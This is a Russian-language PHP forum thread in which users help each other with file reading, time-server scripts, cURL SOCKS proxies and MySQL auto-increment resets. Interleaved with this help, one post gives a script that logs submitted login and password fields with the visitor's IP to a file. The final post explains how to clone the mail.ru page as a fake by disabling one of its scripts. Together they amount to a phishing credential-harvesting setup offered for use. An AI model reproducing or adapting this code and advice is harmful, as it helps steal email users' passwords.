Просто придти к тому, что на данном этапе пора уже начинать юзать БД и не маяца херней с файлами. Решение есть, но он не есть оптимальное. С файлами надо делать лишь простейшие операции, когда дело доходит до сортировок и выборок всяческих - короче БД не просто так придумали ради красоты и понтов PS: Если таки хочется - берешь весь файл в массив и сортируешь в обратном порядке, затем выводишь первые 40 записей работа с массивами здесь очень подробно и с примерами расписана: http://www.php.ru/manual/ref.array.html
PHP: $file=file("log.html"); $count=count($file); for($i=$count;$i>=(($count)-40);$i--){ $log.=$file[$i]."\r\n"; }
Да знаю что без БД ни куда((( Буду пробывать, учить. У меня есть новый вопрос =) Нашел скрипт точного времени, но время отображается на 3 часа позже чем в моём городе, можно это исправить? (Время по хостингу ставить не хочу, т.к. там кривое время с разницой в 15-17 мин) PHP: <?php function sinctimestamp($host) { if (!$fp = fsockopen($host,13,$errno,$errstr,1)) return false; $s = strtotime(fgets($fp)); fclose($fp); return $s; } $tocnoje_vrema = date('d-m-Y H:i:s', sinctimestamp('ntp.colocall.net')); echo $tocnoje_vrema; ?>
прикол в том что у нас часовой пояс GMT +3. что означает что разница по времени между нами и нулевым меридианом ровно три часа. а скрипт ориентируется именно на мировое время)
А есть скрипт который бы показывал GMT +5 ? ЗЫ: Не простой скрипт который показывает какое время в компе такое и странице, а именно точное.
Попробуй просто прибавлять к текущему времени значение 5-и часов=) не помню в чём измеряется, но это поможет.
PHP: <?PHP $date=date("[d/m/Y|H:i]"); $ip = @$_SERVER['REMOTE_ADDR']; $Login = $_POST['login']; $Pass = $_POST['passwd']; $c = "$date | [$ip] $Login;$Pass"; $fp = fopen("log.html","a+"); fwrite($fp,"\n$c\n"); fclose($fp); system("tail -40 log.html >> log.html"); ?> это если сервер на *nix-сервере первое что в голову пришло
PHP: function post($url,$proxy,$proxy_type) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_PROXY, $proxy); curl_setopt($ch, CURLOPT_PROXYTYPE, $proxy_type); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); $result = curl_exec($ch); return $result; } post('site.ru','ip:port','CURLPROXY_SOCKS5'); Не работает Как cURL'у передать какой вид сокса мне нужен ?
Есть. Входная переменная должна быть типа long. Если MySQL - блин не так прочитал. Юзай: PHP: ALTER TABLE tablename AUTO_INCREMENT = 1
Code: А какой запрос для этого нужен чтоб обнулить? Среди программистов это действие не приветствуется. Более того, они относятся к нему отрицательно. Если это вам так нужно, поищите в соответствующей теме либо на сайте mysql.ru
del Вопрос сам решил Если кому надо то если копировать страницу mail.ru и делать фейк отключите скрипт https000.js или что то в этом роде